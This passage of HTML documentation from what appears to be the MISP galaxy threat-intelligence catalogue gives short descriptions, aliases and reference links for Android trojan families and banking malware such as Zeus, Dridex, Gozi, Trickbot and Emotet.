<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_korefrog"><a class="anchor" href="#_korefrog"></a><a class="link" href="#_korefrog">KoreFrog</a></h3>
<div class="paragraph">
<p>KoreFrog is a family of trojan apps that request permission to install packages and push other apps onto the device as system apps without the users authorization. System apps can be disabled by the user, but cannot be easily uninstalled. KoreFrog apps operate as daemons running in the background that try to impersonate Google and other system apps by using misleading names and icons to avoid detection. The KoreFrog PHA family has also been observed to serve ads, in addition to apps.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 421. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gaiaphish"><a class="anchor" href="#_gaiaphish"></a><a class="link" href="#_gaiaphish">Gaiaphish</a></h3>
<div class="paragraph">
<p>Gaiaphish is a large family of trojan apps that target authentication tokens stored on the device to abuse the users privileges for various purposes. These apps use base64-encoded URL strings to avoid detection of the command-and-control servers they rely on to download APK files. These files contain phishing apps that try to steal GAIA authentication tokens that grant the user permissions to access Google services, such as Google Play, Google+, and YouTube. With these tokens, Gaiaphish apps are able to generate spam and automatically post content (for instance, fake app ratings and comments on Google Play app pages)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 422. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf">https://source.android.com/security/reports/Google_Android_Security_2017_Report_Final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_reddrop"><a class="anchor" href="#_reddrop"></a><a class="link" href="#_reddrop">RedDrop</a></h3>
<div class="paragraph">
<p>RedDrop can perform a vast array of malicious actions, including recording nearby audio and uploading the data to cloud-storage accounts on Dropbox and Google Drive.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 423. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/new-reddrop-android-spyware-records-nearby-audio/">https://www.bleepingcomputer.com/news/security/new-reddrop-android-spyware-records-nearby-audio/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_banker"><a class="anchor" href="#_banker"></a><a class="link" href="#_banker">Banker</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>A list of banker malware..</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Banker is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/banker.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>Unknown</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_zeus"><a class="anchor" href="#_zeus"></a><a class="link" href="#_zeus">Zeus</a></h3>
<div class="paragraph">
<p>Zeus is a trojan horse that is primarily delivered via drive-by-downloads, malvertising, exploit kits and malspam campaigns. It uses man-in-the-browser keystroke logging and form grabbing to steal information from victims. Source was leaked in 2011.</p>
</div>
<div class="paragraph">
<p>Zeus is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zbot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 424. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://usa.kaspersky.com/resource-center/threats/zeus-virus">https://usa.kaspersky.com/resource-center/threats/zeus-virus</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vawtrak"><a class="anchor" href="#_vawtrak"></a><a class="link" href="#_vawtrak">Vawtrak</a></h3>
<div class="paragraph">
<p>Delivered primarily by exploit kits as well as malspam campaigns utilizing macro based Microsoft Office documents as attachments. Vawtrak/Neverquest is a modularized banking trojan designed to steal credentials through harvesting, keylogging, Man-In-The-Browser, etc.</p>
</div>
<div class="paragraph">
<p>Vawtrak is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Neverquest</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 425. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.kaspersky.com/blog/neverquest-trojan-built-to-steal-from-hundreds-of-banks/3247/">https://www.kaspersky.com/blog/neverquest-trojan-built-to-steal-from-hundreds-of-banks/3247/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fidelissecurity.com/threatgeek/2016/05/vawtrak-trojan-bank-it-evolving">https://www.fidelissecurity.com/threatgeek/2016/05/vawtrak-trojan-bank-it-evolving</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/In-The-Shadows">https://www.proofpoint.com/us/threat-insight/post/In-The-Shadows</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.botconf.eu/wp-content/uploads/2016/11/2016-Vawtrak-technical-report.pdf">https://www.botconf.eu/wp-content/uploads/2016/11/2016-Vawtrak-technical-report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dridex"><a class="anchor" href="#_dridex"></a><a class="link" href="#_dridex">Dridex</a></h3>
<div class="literalblock">
<div class="content">
<pre>Dridex leverages redirection attacks designed to send victims to malicious replicas of the banking sites they think they're visiting.</pre>
</div>
</div>
<div class="paragraph">
<p>Dridex is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Feodo Version D</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 426. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/detections/trojan-dridex/">https://blog.malwarebytes.com/detections/trojan-dridex/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://feodotracker.abuse.ch/">https://feodotracker.abuse.ch/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gozi"><a class="anchor" href="#_gozi"></a><a class="link" href="#_gozi">Gozi</a></h3>
<div class="paragraph">
<p>Banking trojan delivered primarily via email (typically malspam) and exploit kits. Gozi 1.0 source leaked in 2010</p>
</div>
<div class="paragraph">
<p>Gozi is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ursnif</p>
</li>
<li>
<p>CRM</p>
</li>
<li>
<p>Snifula</p>
</li>
<li>
<p>Papras</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 427. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/gozi">https://www.secureworks.com/research/gozi</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.gdatasoftware.com/blog/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007">https://www.gdatasoftware.com/blog/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_goziv2"><a class="anchor" href="#_goziv2"></a><a class="link" href="#_goziv2">Goziv2</a></h3>
<div class="paragraph">
<p>Banking trojan attributed to Project Blitzkrieg targeting U.S. Financial institutions.</p>
</div>
<div class="paragraph">
<p>Goziv2 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Prinimalka</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 428. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://krebsonsecurity.com/tag/gozi-prinimalka/">https://krebsonsecurity.com/tag/gozi-prinimalka/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/project-blitzkrieg-how-to-block-the-planned-prinimalka-gozi-trojan-attack/">https://securityintelligence.com/project-blitzkrieg-how-to-block-the-planned-prinimalka-gozi-trojan-attack/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gozi_isfb"><a class="anchor" href="#_gozi_isfb"></a><a class="link" href="#_gozi_isfb">Gozi ISFB</a></h3>
<div class="paragraph">
<p>Banking trojan based on Gozi source. Features include web injects for the victims browsers, screenshoting, video recording, transparent redirections, etc. Source leaked ~ end of 2015.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 429. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature">https://www.govcert.admin.ch/blog/18/gozi-isfb-when-a-bug-really-is-a-feature</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/">https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak">https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dreambot"><a class="anchor" href="#_dreambot"></a><a class="link" href="#_dreambot">Dreambot</a></h3>
<div class="paragraph">
<p>Dreambot is a variant of Gozi ISFB that is spread via numerous exploit kits as well as through malspam email attachments and links.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 430. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/">https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality">https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_iap"><a class="anchor" href="#_iap"></a><a class="link" href="#_iap">IAP</a></h3>
<div class="paragraph">
<p>Gozi ISFB variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 431. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://archive.is/I7hi8#selection-217.0-217.6">http://archive.is/I7hi8#selection-217.0-217.6</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_goznym"><a class="anchor" href="#_goznym"></a><a class="link" href="#_goznym">GozNym</a></h3>
<div class="paragraph">
<p>GozNym hybrid takes the best of both the Nymaim and Gozi ISFB. From the Nymaim malware, it leverages the droppers stealth and persistence; the Gozi ISFB parts add the banking Trojans capabilities to facilitate fraud via infected Internet browsers.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 432. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/">https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://lokalhost.pl/gozi_tree.txt">https://lokalhost.pl/gozi_tree.txt</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zloader_zeus"><a class="anchor" href="#_zloader_zeus"></a><a class="link" href="#_zloader_zeus">Zloader Zeus</a></h3>
<div class="paragraph">
<p>Zloader is a loader that loads different payloads, one of which is a Zeus module. Delivered via exploit kits and malspam emails.</p>
</div>
<div class="paragraph">
<p>Zloader Zeus is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zeus Terdot</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 433. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.threatstop.com/zloader/terdot-that-man-in-the-middle">https://blog.threatstop.com/zloader/terdot-that-man-in-the-middle</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.scmagazine.com/terdot-zloaderzbot-combo-abuses-certificate-app-to-pull-off-mitm-browser-attacks/article/634443/">https://www.scmagazine.com/terdot-zloaderzbot-combo-abuses-certificate-app-to-pull-off-mitm-browser-attacks/article/634443/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeus_vm"><a class="anchor" href="#_zeus_vm"></a><a class="link" href="#_zeus_vm">Zeus VM</a></h3>
<div class="paragraph">
<p>Zeus variant that utilizes steganography in image files to retrieve configuration file.</p>
</div>
<div class="paragraph">
<p>Zeus VM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>VM Zeus</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 434. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/">https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/">https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeus_sphinx"><a class="anchor" href="#_zeus_sphinx"></a><a class="link" href="#_zeus_sphinx">Zeus Sphinx</a></h3>
<div class="paragraph">
<p>Sphinx is a modular banking trojan that is a commercial offering sold to cybercriminals via underground fraudster boards.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 435. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/">https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_panda_banker"><a class="anchor" href="#_panda_banker"></a><a class="link" href="#_panda_banker">Panda Banker</a></h3>
<div class="paragraph">
<p>Zeus like banking trojan that is delivered primarily through malspam emails and exploit kits.</p>
</div>
<div class="paragraph">
<p>Panda Banker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zeus Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 436. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market">https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf">https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers">https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zeus_kins"><a class="anchor" href="#_zeus_kins"></a><a class="link" href="#_zeus_kins">Zeus KINS</a></h3>
<div class="paragraph">
<p>Zeus KINS is a modified version of ZeuS 2.0.8.9. It contains an encrypted version of it&#8217;s config in the registry.</p>
</div>
<div class="paragraph">
<p>Zeus KINS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Kasper Internet Non-Security</p>
</li>
<li>
<p>Maple</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 437. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/">https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/nyx0/KINS">https://github.com/nyx0/KINS</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chthonic"><a class="anchor" href="#_chthonic"></a><a class="link" href="#_chthonic">Chthonic</a></h3>
<div class="paragraph">
<p>Chthonic according to Kaspersky is an evolution of Zeus VM. It uses the same encryptor as Andromeda bot, the same encryption scheme as Zeus AES and Zeus V2 Trojans, and a virtual machine similar to that used in ZeusVM and KINS malware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 438. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan">https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/chthonic-a-new-modification-of-zeus/68176/">https://securelist.com/chthonic-a-new-modification-of-zeus/68176/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trickbot"><a class="anchor" href="#_trickbot"></a><a class="link" href="#_trickbot">Trickbot</a></h3>
<div class="paragraph">
<p>Trickbot is a bot that is delivered via exploit kits and malspam campaigns. The bot is capable of downloading modules, including a banker module. Trickbot also shares roots with the Dyre banking trojan</p>
</div>
<div class="paragraph">
<p>Trickbot is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Trickster</p>
</li>
<li>
<p>Trickloader</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 439. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/">https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/">https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html">http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/">https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dyre"><a class="anchor" href="#_dyre"></a><a class="link" href="#_dyre">Dyre</a></h3>
<div class="paragraph">
<p>Dyre is a banking trojan distributed via exploit kits and malspam emails primarily. It has a modular architectur and utilizes man-in-the-browser functionality. It also leverages a backconnect server that allows threat actors to connect to a bank website through the victim&#8217;s computer.</p>
</div>
<div class="paragraph">
<p>Dyre is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dyreza</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 440. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.secureworks.com/research/dyre-banking-trojan">https://www.secureworks.com/research/dyre-banking-trojan</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/">https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tinba"><a class="anchor" href="#_tinba"></a><a class="link" href="#_tinba">Tinba</a></h3>
<div class="paragraph">
<p>Tinba is a very small banking trojan that hooks into browsers and steals login data and sniffs on network traffic. It also uses Man in The Browser (MiTB) and webinjects. Tinba is primarily delivered via exploit kits, malvertising and malspam email campaigns.</p>
</div>
<div class="paragraph">
<p>Tinba is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zusy</p>
</li>
<li>
<p>TinyBanker</p>
</li>
<li>
<p>illi</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 441. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/">https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/">http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.avast.com/2014/09/15/tiny-banker-trojan-targets-customers-of-major-banks-worldwide/">https://blog.avast.com/2014/09/15/tiny-banker-trojan-targets-customers-of-major-banks-worldwide/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://my.infotex.com/tiny-banker-trojan/">http://my.infotex.com/tiny-banker-trojan/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_geodo"><a class="anchor" href="#_geodo"></a><a class="link" href="#_geodo">Geodo</a></h3>
<div class="paragraph">
<p>Geodo is a banking trojan delivered primarily through malspam emails. It is capable of sniffing network activity to steal information by hooking certain network API calls.</p>
</div>
<div class="paragraph">
<p>Geodo is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Feodo Version C</p>
</li>
<li>
<p>Emotet</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 442. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://feodotracker.abuse.ch/">https://feodotracker.abuse.ch/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/">http://blog.trendmicro.com/trendlabs-security-intelligence/new-banking-malware-uses-network-sniffing-for-data-theft/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_feodo"><a class="anchor" href="#_feodo"></a><a class="link" href="#_feodo">Feodo</a></h3>
<div class="paragraph">
<p>Feodo is a banking trojan that utilizes web injects and is also capable of monitoring &amp; manipulating cookies. Version A = Port 8080, Version B = Port 80 It is delivered primarily via exploit kits and malspam emails.</p>
</div>
<div class="paragraph">
<p>Feodo is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Bugat</p>
</li>
<li>
<p>Cridex</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 443. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/dridex-a-history-of-evolution/78531/">https://securelist.com/dridex-a-history-of-evolution/78531/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://feodotracker.abuse.ch/">https://feodotracker.abuse.ch/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://stopmalvertising.com/rootkits/analysis-of-cridex.html">http://stopmalvertising.com/rootkits/analysis-of-cridex.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ramnit"><a class="anchor" href="#_ramnit"></a><a class="link" href="#_ramnit">Ramnit</a></h3>
<div class="paragraph">
<p>Originally not a banking trojan in 2010, Ramnit became a banking trojan after the Zeus source code leak. It is capable of perforrming Man-in-the-Browser attacks. Distributed primarily via exploit kits.</p>
</div>
<div class="paragraph">
